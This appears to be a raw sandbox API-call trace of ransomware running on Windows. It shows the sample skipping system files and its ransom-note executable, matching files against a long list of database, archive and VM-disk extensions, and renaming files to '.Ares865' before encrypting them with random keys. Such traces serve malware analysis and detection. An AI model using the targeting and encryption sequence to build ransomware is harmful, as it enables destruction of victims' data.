lstrcmpiW (lpString1="png", lpString2="orx") returned 1 [0089.503] lstrlenW (lpString="owc") returned 3 [0089.503] lstrcmpiW (lpString1="png", lpString2="owc") returned 1 [0089.503] lstrlenW (lpString="p96") returned 3 [0089.503] lstrcmpiW (lpString1="png", lpString2="p96") returned 1 [0089.503] lstrlenW (lpString="p97") returned 3 [0089.503] lstrcmpiW (lpString1="png", lpString2="p97") returned 1 [0089.503] lstrlenW (lpString="pan") returned 3 [0089.503] lstrcmpiW (lpString1="png", lpString2="pan") returned 1 [0089.503] lstrlenW (lpString="pdb") returned 3 [0089.504] lstrcmpiW (lpString1="png", lpString2="pdb") returned 1 [0089.504] lstrlenW (lpString="pdm") returned 3 [0089.504] lstrcmpiW (lpString1="png", lpString2="pdm") returned 1 [0089.504] lstrlenW (lpString="pnz") returned 3 [0089.504] lstrcmpiW (lpString1="png", lpString2="pnz") returned -1 [0089.504] lstrlenW (lpString="qry") returned 3 [0089.504] lstrcmpiW (lpString1="png", lpString2="qry") returned -1 [0089.504] lstrlenW (lpString="qvd") returned 3 [0089.504] lstrcmpiW (lpString1="png", lpString2="qvd") returned -1 [0089.504] lstrlenW (lpString="rbf") returned 3 [0089.504] lstrcmpiW (lpString1="png", lpString2="rbf") returned -1 [0089.504] lstrlenW (lpString="rctd") returned 4 [0089.504] lstrcmpiW (lpString1=".png", lpString2="rctd") returned -1 [0089.504] lstrlenW (lpString="rod") returned 3 [0089.504] lstrcmpiW (lpString1="png", lpString2="rod") returned -1 [0089.504] lstrlenW (lpString="rodx") returned 4 [0089.504] lstrcmpiW (lpString1=".png", lpString2="rodx") returned -1 [0089.504] lstrlenW (lpString="rpd") returned 3 [0089.504] lstrcmpiW (lpString1="png", lpString2="rpd") returned -1 [0089.504] lstrlenW (lpString="rsd") returned 3 [0089.504] lstrcmpiW (lpString1="png", lpString2="rsd") returned -1 [0089.504] lstrlenW (lpString="sas7bdat") returned 8 [0089.504] lstrcmpiW (lpString1="ound.png", lpString2="sas7bdat") returned -1 [0089.504] lstrlenW (lpString="sbf") returned 3 [0089.504] lstrcmpiW (lpString1="png", lpString2="sbf") returned -1 [0089.504] lstrlenW (lpString="scx") returned 3 [0089.504] lstrcmpiW (lpString1="png", lpString2="scx") returned -1 [0089.504] lstrlenW (lpString="sdb") returned 3 [0089.504] lstrcmpiW (lpString1="png", lpString2="sdb") returned -1 [0089.504] lstrlenW (lpString="sdc") returned 3 [0089.504] lstrcmpiW (lpString1="png", lpString2="sdc") returned -1 [0089.504] lstrlenW (lpString="sdf") returned 3 [0089.504] lstrcmpiW (lpString1="png", lpString2="sdf") returned -1 [0089.504] lstrlenW (lpString="sis") returned 3 [0089.504] lstrcmpiW (lpString1="png", lpString2="sis") returned -1 [0089.504] lstrlenW (lpString="spq") returned 3 [0089.504] lstrcmpiW (lpString1="png", lpString2="spq") returned -1 [0089.504] lstrlenW (lpString="te") returned 2 [0089.504] lstrcmpiW (lpString1="ng", lpString2="te") returned -1 [0089.504] lstrlenW (lpString="teacher") returned 7 [0089.505] lstrcmpiW (lpString1="und.png", lpString2="teacher") returned 1 [0089.505] lstrlenW (lpString="tmd") returned 3 [0089.505] lstrcmpiW (lpString1="png", lpString2="tmd") returned -1 [0089.505] lstrlenW (lpString="tps") returned 3 [0089.505] lstrcmpiW (lpString1="png", lpString2="tps") returned -1 [0089.505] lstrlenW (lpString="trc") returned 3 [0089.505] lstrcmpiW (lpString1="png", lpString2="trc") returned -1 [0089.505] lstrlenW (lpString="trc") returned 3 [0089.505] lstrcmpiW (lpString1="png", lpString2="trc") returned -1 [0089.505] lstrlenW (lpString="trm") returned 3 [0089.505] lstrcmpiW (lpString1="png", lpString2="trm") returned -1 [0089.505] lstrlenW (lpString="udb") returned 3 [0089.505] lstrcmpiW (lpString1="png", lpString2="udb") returned -1 [0089.505] lstrlenW (lpString="udl") returned 3 [0089.505] lstrcmpiW (lpString1="png", lpString2="udl") returned -1 [0089.505] lstrlenW (lpString="usr") returned 3 [0089.505] lstrcmpiW (lpString1="png", lpString2="usr") returned -1 [0089.505] lstrlenW (lpString="v12") returned 3 [0089.505] lstrcmpiW (lpString1="png", lpString2="v12") returned -1 [0089.505] lstrlenW (lpString="vis") returned 3 [0089.505] lstrcmpiW (lpString1="png", lpString2="vis") returned -1 [0089.505] lstrlenW (lpString="vpd") returned 3 [0089.505] lstrcmpiW (lpString1="png", lpString2="vpd") returned -1 [0089.505] lstrlenW (lpString="vvv") returned 3 [0089.505] lstrcmpiW (lpString1="png", lpString2="vvv") returned -1 [0089.505] lstrlenW (lpString="wdb") returned 3 [0089.505] lstrcmpiW (lpString1="png", lpString2="wdb") returned -1 [0089.505] lstrlenW (lpString="wmdb") returned 4 [0089.505] lstrcmpiW (lpString1=".png", lpString2="wmdb") returned -1 [0089.505] lstrlenW (lpString="wrk") returned 3 [0089.505] lstrcmpiW (lpString1="png", lpString2="wrk") returned -1 [0089.505] lstrlenW (lpString="xdb") returned 3 [0089.505] lstrcmpiW (lpString1="png", lpString2="xdb") returned -1 [0089.505] lstrlenW (lpString="xld") returned 3 [0089.505] lstrcmpiW (lpString1="png", lpString2="xld") returned -1 [0089.505] lstrlenW (lpString="xmlff") returned 5 [0089.505] lstrcmpiW (lpString1="d.png", lpString2="xmlff") returned -1 [0089.505] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.Ares865") returned 110 [0089.505] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.ares865"), dwFlags=0x1) returned 1 [0089.506] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.507] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=129745) returned 1 [0089.507] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.507] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.507] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0089.507] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.508] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.508] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.508] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1fde0, lpName=0x0) returned 0x15c [0089.510] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1fde0) returned 0x190000 [0089.516] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.517] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.517] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.517] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.517] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.517] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.517] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.517] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.517] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.517] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0089.518] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.518] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0089.518] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.518] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0089.519] CloseHandle (hObject=0x15c) returned 1 [0089.519] CloseHandle (hObject=0x118) returned 1 [0089.519] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.519] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.519] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.520] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2feb941, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2feb941, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x4c824c40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xa70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="behavior.xml.Ares865", cAlternateFileName="")) returned 1 [0089.520] lstrcmpiW (lpString1="behavior.xml.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.520] lstrcmpiW (lpString1="behavior.xml.Ares865", lpString2="aoldtz.exe") returned 1 [0089.520] lstrcmpiW (lpString1="behavior.xml.Ares865", lpString2=".") returned 1 [0089.520] lstrcmpiW (lpString1="behavior.xml.Ares865", lpString2="..") returned 1 [0089.520] lstrcmpiW (lpString1="behavior.xml.Ares865", lpString2="windows") returned -1 [0089.520] lstrcmpiW (lpString1="behavior.xml.Ares865", lpString2="bootmgr") returned -1 [0089.520] lstrcmpiW (lpString1="behavior.xml.Ares865", lpString2="temp") returned -1 [0089.520] lstrcmpiW (lpString1="behavior.xml.Ares865", lpString2="pagefile.sys") returned -1 [0089.520] lstrcmpiW (lpString1="behavior.xml.Ares865", lpString2="boot") returned -1 [0089.520] lstrcmpiW (lpString1="behavior.xml.Ares865", lpString2="ids.txt") returned -1 [0089.520] lstrcmpiW (lpString1="behavior.xml.Ares865", lpString2="ntuser.dat") returned -1 [0089.520] lstrcmpiW (lpString1="behavior.xml.Ares865", lpString2="perflogs") returned -1 [0089.520] lstrcmpiW (lpString1="behavior.xml.Ares865", lpString2="MSBuild") returned -1 [0089.520] lstrlenW (lpString="behavior.xml.Ares865") returned 20 [0089.520] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png") returned 102 [0089.520] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="behavior.xml.Ares865" | out: lpString1="behavior.xml.Ares865") returned="behavior.xml.Ares865" [0089.520] lstrlenW (lpString="behavior.xml.Ares865") returned 20 [0089.520] lstrlenW (lpString="Ares865") returned 7 [0089.520] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0089.520] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c7feae0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c7feae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.520] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.520] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3011a9e, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd3011a9e, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x9c0d5455, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="watermark.png", cAlternateFileName="")) returned 1 [0089.520] lstrcmpiW (lpString1="watermark.png", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.520] lstrcmpiW (lpString1="watermark.png", lpString2="aoldtz.exe") returned 1 [0089.520] lstrcmpiW (lpString1="watermark.png", lpString2=".") returned 1 [0089.520] lstrcmpiW (lpString1="watermark.png", lpString2="..") returned 1 [0089.521] lstrcmpiW (lpString1="watermark.png", lpString2="windows") returned -1 [0089.521] lstrcmpiW (lpString1="watermark.png", lpString2="bootmgr") returned 1 [0089.521] lstrcmpiW (lpString1="watermark.png", lpString2="temp") returned 1 [0089.521] lstrcmpiW (lpString1="watermark.png", lpString2="pagefile.sys") returned 1 [0089.521] lstrcmpiW (lpString1="watermark.png", lpString2="boot") returned 1 [0089.521] lstrcmpiW (lpString1="watermark.png", lpString2="ids.txt") returned 1 [0089.521] lstrcmpiW (lpString1="watermark.png", lpString2="ntuser.dat") returned 1 [0089.521] lstrcmpiW (lpString1="watermark.png", lpString2="perflogs") returned 1 [0089.521] lstrcmpiW (lpString1="watermark.png", lpString2="MSBuild") returned 1 [0089.521] lstrlenW (lpString="watermark.png") returned 13 [0089.521] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml.Ares865") returned 108 [0089.521] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="watermark.png" | out: lpString1="watermark.png") returned="watermark.png" [0089.521] lstrlenW (lpString="watermark.png") returned 13 [0089.521] lstrlenW (lpString="Ares865") returned 7 [0089.521] lstrcmpiW (lpString1="ark.png", lpString2="Ares865") returned 1 [0089.521] lstrlenW (lpString=".dll") returned 4 [0089.521] lstrcmpiW (lpString1="watermark.png", lpString2=".dll") returned 1 [0089.521] lstrlenW (lpString=".lnk") returned 4 [0089.521] lstrcmpiW (lpString1="watermark.png", lpString2=".lnk") returned 1 [0089.521] lstrlenW (lpString=".ini") returned 4 [0089.521] lstrcmpiW (lpString1="watermark.png", lpString2=".ini") returned 1 [0089.521] lstrlenW (lpString=".sys") returned 4 [0089.521] lstrcmpiW (lpString1="watermark.png", lpString2=".sys") returned 1 [0089.521] lstrlenW (lpString="watermark.png") returned 13 [0089.521] lstrlenW (lpString="bak") returned 3 [0089.521] lstrcmpiW (lpString1="png", lpString2="bak") returned 1 [0089.521] lstrlenW (lpString="ba_") returned 3 [0089.521] lstrcmpiW (lpString1="png", lpString2="ba_") returned 1 [0089.521] lstrlenW (lpString="dbb") returned 3 [0089.521] lstrcmpiW (lpString1="png", lpString2="dbb") returned 1 [0089.521] lstrlenW (lpString="vmdk") returned 4 [0089.521] lstrcmpiW (lpString1=".png", lpString2="vmdk") returned -1 [0089.521] lstrlenW (lpString="rar") returned 3 [0089.521] lstrcmpiW (lpString1="png", lpString2="rar") returned -1 [0089.521] lstrlenW (lpString="zip") returned 3 [0089.521] lstrcmpiW (lpString1="png", lpString2="zip") returned -1 [0089.521] lstrlenW (lpString="tgz") returned 3 [0089.521] lstrcmpiW (lpString1="png", lpString2="tgz") returned -1 [0089.521] lstrlenW (lpString="vbox") returned 4 [0089.522] lstrcmpiW (lpString1=".png", lpString2="vbox") returned -1 [0089.522] lstrlenW (lpString="vdi") returned 3 [0089.522] lstrcmpiW (lpString1="png", lpString2="vdi") returned -1 [0089.522] lstrlenW (lpString="vhd") returned 3 [0089.522] lstrcmpiW (lpString1="png", lpString2="vhd") returned -1 [0089.522] lstrlenW (lpString="vhdx") returned 4 [0089.522] lstrcmpiW (lpString1=".png", lpString2="vhdx") returned -1 [0089.522] lstrlenW (lpString="avhd") returned 4 [0089.522] lstrcmpiW (lpString1=".png", lpString2="avhd") returned -1 [0089.522] lstrlenW (lpString="db") returned 2 [0089.522] lstrcmpiW (lpString1="ng", lpString2="db") returned 1 [0089.522] lstrlenW (lpString="db2") returned 3 [0089.522] lstrcmpiW (lpString1="png", lpString2="db2") returned 1 [0089.522] lstrlenW (lpString="db3") returned 3 [0089.522] lstrcmpiW (lpString1="png", lpString2="db3") returned 1 [0089.522] lstrlenW (lpString="dbf") returned 3 [0089.522] lstrcmpiW (lpString1="png", lpString2="dbf") returned 1 [0089.522] lstrlenW (lpString="mdf") returned 3 [0089.522] lstrcmpiW (lpString1="png", lpString2="mdf") returned 1 [0089.522] lstrlenW (lpString="mdb") returned 3 [0089.522] lstrcmpiW (lpString1="png", lpString2="mdb") returned 1 [0089.522] lstrlenW (lpString="sql") returned 3 [0089.522] lstrcmpiW (lpString1="png", lpString2="sql") returned -1 [0089.522] lstrlenW (lpString="sqlite") returned 6 [0089.522] lstrcmpiW (lpString1="rk.png", lpString2="sqlite") returned -1 [0089.522] lstrlenW (lpString="sqlite3") returned 7 [0089.522] lstrcmpiW (lpString1="ark.png", lpString2="sqlite3") returned -1 [0089.522] lstrlenW (lpString="sqlitedb") returned 8 [0089.522] lstrcmpiW (lpString1="mark.png", lpString2="sqlitedb") returned -1 [0089.522] lstrlenW (lpString="xml") returned 3 [0089.522] lstrcmpiW (lpString1="png", lpString2="xml") returned -1 [0089.522] lstrlenW (lpString="$er") returned 3 [0089.522] lstrcmpiW (lpString1="png", lpString2="$er") returned 1 [0089.523] lstrlenW (lpString="4dd") returned 3 [0089.523] lstrcmpiW (lpString1="png", lpString2="4dd") returned 1 [0089.523] lstrlenW (lpString="4dl") returned 3 [0089.523] lstrcmpiW (lpString1="png", lpString2="4dl") returned 1 [0089.523] lstrlenW (lpString="^^^") returned 3 [0089.523] lstrcmpiW (lpString1="png", lpString2="^^^") returned 1 [0089.523] lstrlenW (lpString="abs") returned 3 [0089.523] lstrcmpiW (lpString1="png", lpString2="abs") returned 1 [0089.523] lstrlenW (lpString="abx") returned 3 [0089.523] lstrcmpiW (lpString1="png", lpString2="abx") returned 1 [0089.523] lstrlenW (lpString="accdb") returned 5 [0089.523] lstrcmpiW (lpString1="k.png", lpString2="accdb") returned 1 [0089.523] lstrlenW (lpString="accdc") returned 5 [0089.523] lstrcmpiW (lpString1="k.png", lpString2="accdc") returned 1 [0089.523] lstrlenW (lpString="accde") returned 5 [0089.523] lstrcmpiW (lpString1="k.png", lpString2="accde") returned 1 [0089.523] lstrlenW (lpString="accdr") returned 5 [0089.523] lstrcmpiW (lpString1="k.png", lpString2="accdr") returned 1 [0089.523] lstrlenW (lpString="accdt") returned 5 [0089.523] lstrcmpiW (lpString1="k.png", lpString2="accdt") returned 1 [0089.523] lstrlenW (lpString="accdw") returned 5 [0089.523] lstrcmpiW (lpString1="k.png", lpString2="accdw") returned 1 [0089.523] lstrlenW (lpString="accft") returned 5 [0089.523] lstrcmpiW (lpString1="k.png", lpString2="accft") returned 1 [0089.523] lstrlenW (lpString="adb") returned 3 [0089.523] lstrcmpiW (lpString1="png", lpString2="adb") returned 1 [0089.523] lstrlenW (lpString="adb") returned 3 [0089.523] lstrcmpiW (lpString1="png", lpString2="adb") returned 1 [0089.523] lstrlenW (lpString="ade") returned 3 [0089.523] lstrcmpiW (lpString1="png", lpString2="ade") returned 1 [0089.523] lstrlenW (lpString="adf") returned 3 [0089.523] lstrcmpiW (lpString1="png", lpString2="adf") returned 1 [0089.523] lstrlenW (lpString="adn") returned 3 [0089.523] lstrcmpiW (lpString1="png", lpString2="adn") returned 1 [0089.523] lstrlenW (lpString="adp") returned 3 [0089.523] lstrcmpiW (lpString1="png", lpString2="adp") returned 1 [0089.523] lstrlenW (lpString="alf") returned 3 [0089.523] lstrcmpiW (lpString1="png", lpString2="alf") returned 1 [0089.524] lstrlenW (lpString="ask") returned 3 [0089.524] lstrcmpiW (lpString1="png", lpString2="ask") returned 1 [0089.524] lstrlenW (lpString="btr") returned 3 [0089.524] lstrcmpiW (lpString1="png", lpString2="btr") returned 1 [0089.524] lstrlenW (lpString="cat") returned 3 [0089.524] lstrcmpiW (lpString1="png", lpString2="cat") returned 1 [0089.524] lstrlenW (lpString="cdb") returned 3 [0089.524] lstrcmpiW (lpString1="png", lpString2="cdb") returned 1 [0089.524] lstrlenW (lpString="ckp") returned 3 [0089.524] lstrcmpiW (lpString1="png", lpString2="ckp") returned 1 [0089.524] lstrlenW (lpString="cma") returned 3 [0089.524] lstrcmpiW (lpString1="png", lpString2="cma") returned 1 [0089.524] lstrlenW (lpString="cpd") returned 3 [0089.524] lstrcmpiW (lpString1="png", lpString2="cpd") returned 1 [0089.524] lstrlenW (lpString="dacpac") returned 6 [0089.524] lstrcmpiW (lpString1="rk.png", lpString2="dacpac") returned 1 [0089.524] lstrlenW (lpString="dad") returned 3 [0089.524] lstrcmpiW (lpString1="png", lpString2="dad") returned 1 [0089.524] lstrlenW (lpString="dadiagrams") returned 10 [0089.524] lstrcmpiW (lpString1="ermark.png", lpString2="dadiagrams") returned 1 [0089.524] lstrlenW (lpString="daschema") returned 8 [0089.524] lstrcmpiW (lpString1="mark.png", lpString2="daschema") returned 1 [0089.524] lstrlenW (lpString="db-journal") returned 10 [0089.524] lstrcmpiW (lpString1="ermark.png", lpString2="db-journal") returned 1 [0089.524] lstrlenW (lpString="db-shm") returned 6 [0089.524] lstrcmpiW (lpString1="rk.png", lpString2="db-shm") returned 1 [0089.524] lstrlenW (lpString="db-wal") returned 6 [0089.524] lstrcmpiW (lpString1="rk.png", lpString2="db-wal") returned 1 [0089.524] lstrlenW (lpString="dbc") returned 3 [0089.524] lstrcmpiW (lpString1="png", lpString2="dbc") returned 1 [0089.524] lstrlenW (lpString="dbs") returned 3 [0089.524] lstrcmpiW (lpString1="png", lpString2="dbs") returned 1 [0089.524] lstrlenW (lpString="dbt") returned 3 [0089.524] lstrcmpiW (lpString1="png", lpString2="dbt") returned 1 [0089.524] lstrlenW (lpString="dbv") returned 3 [0089.524] lstrcmpiW (lpString1="png", lpString2="dbv") returned 1 [0089.524] lstrlenW (lpString="dbx") returned 3 [0089.524] lstrcmpiW (lpString1="png", lpString2="dbx") returned 1 [0089.524] lstrlenW (lpString="dcb") returned 3 [0089.524] lstrcmpiW (lpString1="png", lpString2="dcb") returned 1 [0089.525] lstrlenW (lpString="dct") returned 3 [0089.525] lstrcmpiW (lpString1="png", lpString2="dct") returned 1 [0089.525] lstrlenW (lpString="dcx") returned 3 [0089.525] lstrcmpiW (lpString1="png", lpString2="dcx") returned 1 [0089.525] lstrlenW (lpString="ddl") returned 3 [0089.525] lstrcmpiW (lpString1="png", lpString2="ddl") returned 1 [0089.525] lstrlenW (lpString="dlis") returned 4 [0089.525] lstrcmpiW (lpString1=".png", lpString2="dlis") returned -1 [0089.525] lstrlenW (lpString="dp1") returned 3 [0089.525] lstrcmpiW (lpString1="png", lpString2="dp1") returned 1 [0089.525] lstrlenW (lpString="dqy") returned 3 [0089.525] lstrcmpiW (lpString1="png", lpString2="dqy") returned 1 [0089.525] lstrlenW (lpString="dsk") returned 3 [0089.525] lstrcmpiW (lpString1="png", lpString2="dsk") returned 1 [0089.525] lstrlenW (lpString="dsn") returned 3 [0089.525] lstrcmpiW (lpString1="png", lpString2="dsn") returned 1 [0089.525] lstrlenW (lpString="dtsx") returned 4 [0089.525] lstrcmpiW (lpString1=".png", lpString2="dtsx") returned -1 [0089.525] lstrlenW (lpString="dxl") returned 3 [0089.525] lstrcmpiW (lpString1="png", lpString2="dxl") returned 1 [0089.525] lstrlenW (lpString="eco") returned 3 [0089.525] lstrcmpiW (lpString1="png", lpString2="eco") returned 1 [0089.525] lstrlenW (lpString="ecx") returned 3 [0089.525] lstrcmpiW (lpString1="png", lpString2="ecx") returned 1 [0089.525] lstrlenW (lpString="edb") returned 3 [0089.525] lstrcmpiW (lpString1="png", lpString2="edb") returned 1 [0089.525] lstrlenW (lpString="epim") returned 4 [0089.525] lstrcmpiW (lpString1=".png", lpString2="epim") returned -1 [0089.525] lstrlenW (lpString="fcd") returned 3 [0089.525] lstrcmpiW (lpString1="png", lpString2="fcd") returned 1 [0089.525] lstrlenW (lpString="fdb") returned 3 [0089.525] lstrcmpiW (lpString1="png", lpString2="fdb") returned 1 [0089.525] lstrlenW (lpString="fic") returned 3 [0089.525] lstrcmpiW (lpString1="png", lpString2="fic") returned 1 [0089.525] lstrlenW (lpString="flexolibrary") returned 12 [0089.525] lstrcmpiW (lpString1="atermark.png", lpString2="flexolibrary") returned -1 [0089.525] lstrlenW (lpString="fm5") returned 3 [0089.525] lstrcmpiW (lpString1="png", lpString2="fm5") returned 1 [0089.525] lstrlenW (lpString="fmp") returned 3 [0089.525] lstrcmpiW (lpString1="png", lpString2="fmp") returned 1 [0089.526] lstrlenW (lpString="fmp12") returned 5 [0089.526] lstrcmpiW (lpString1="k.png", lpString2="fmp12") returned 1 [0089.526] lstrlenW (lpString="fmpsl") returned 5 [0089.526] lstrcmpiW (lpString1="k.png", lpString2="fmpsl") returned 1 [0089.526] lstrlenW (lpString="fol") returned 3 [0089.526] lstrcmpiW (lpString1="png", lpString2="fol") returned 1 [0089.526] lstrlenW (lpString="fp3") returned 3 [0089.526] lstrcmpiW (lpString1="png", lpString2="fp3") returned 1 [0089.526] lstrlenW (lpString="fp4") returned 3 [0089.526] lstrcmpiW (lpString1="png", lpString2="fp4") returned 1 [0089.526] lstrlenW (lpString="fp5") returned 3 [0089.526] lstrcmpiW (lpString1="png", lpString2="fp5") returned 1 [0089.526] lstrlenW (lpString="fp7") returned 3 [0089.526] lstrcmpiW (lpString1="png", lpString2="fp7") returned 1 [0089.526] lstrlenW (lpString="fpt") returned 3 [0089.526] lstrcmpiW (lpString1="png", lpString2="fpt") returned 1 [0089.526] lstrlenW (lpString="frm") returned 3 [0089.526] lstrcmpiW (lpString1="png", lpString2="frm") returned 1 [0089.526] lstrlenW (lpString="gdb") returned 3 [0089.526] lstrcmpiW (lpString1="png", lpString2="gdb") returned 1 [0089.526] lstrlenW (lpString="gdb") returned 3 [0089.526] lstrcmpiW (lpString1="png", lpString2="gdb") returned 1 [0089.526] lstrlenW (lpString="grdb") returned 4 [0089.526] lstrcmpiW (lpString1=".png", lpString2="grdb") returned -1 [0089.526] lstrlenW (lpString="gwi") returned 3 [0089.526] lstrcmpiW (lpString1="png", lpString2="gwi") returned 1 [0089.526] lstrlenW (lpString="hdb") returned 3 [0089.526] lstrcmpiW (lpString1="png", lpString2="hdb") returned 1 [0089.526] lstrlenW (lpString="his") returned 3 [0089.526] lstrcmpiW (lpString1="png", lpString2="his") returned 1 [0089.526] lstrlenW (lpString="ib") returned 2 [0089.526] lstrcmpiW (lpString1="ng", lpString2="ib") returned 1 [0089.526] lstrlenW (lpString="idb") returned 3 [0089.526] lstrcmpiW (lpString1="png", lpString2="idb") returned 1 [0089.526] lstrlenW (lpString="ihx") returned 3 [0089.526] lstrcmpiW (lpString1="png", lpString2="ihx") returned 1 [0089.526] lstrlenW (lpString="itdb") returned 4 [0089.526] lstrcmpiW (lpString1=".png", lpString2="itdb") returned -1 [0089.526] lstrlenW (lpString="itw") returned 3 [0089.527] lstrcmpiW (lpString1="png", lpString2="itw") returned 1 [0089.527] lstrlenW (lpString="jet") returned 3 [0089.527] lstrcmpiW (lpString1="png", lpString2="jet") returned 1 [0089.527] lstrlenW (lpString="jtx") returned 3 [0089.527] lstrcmpiW (lpString1="png", lpString2="jtx") returned 1 [0089.527] lstrlenW (lpString="kdb") returned 3 [0089.527] lstrcmpiW (lpString1="png", lpString2="kdb") returned 1 [0089.527] lstrlenW (lpString="kexi") returned 4 [0089.527] lstrcmpiW (lpString1=".png", lpString2="kexi") returned -1 [0089.527] lstrlenW (lpString="kexic") returned 5 [0089.527] lstrcmpiW (lpString1="k.png", lpString2="kexic") returned -1 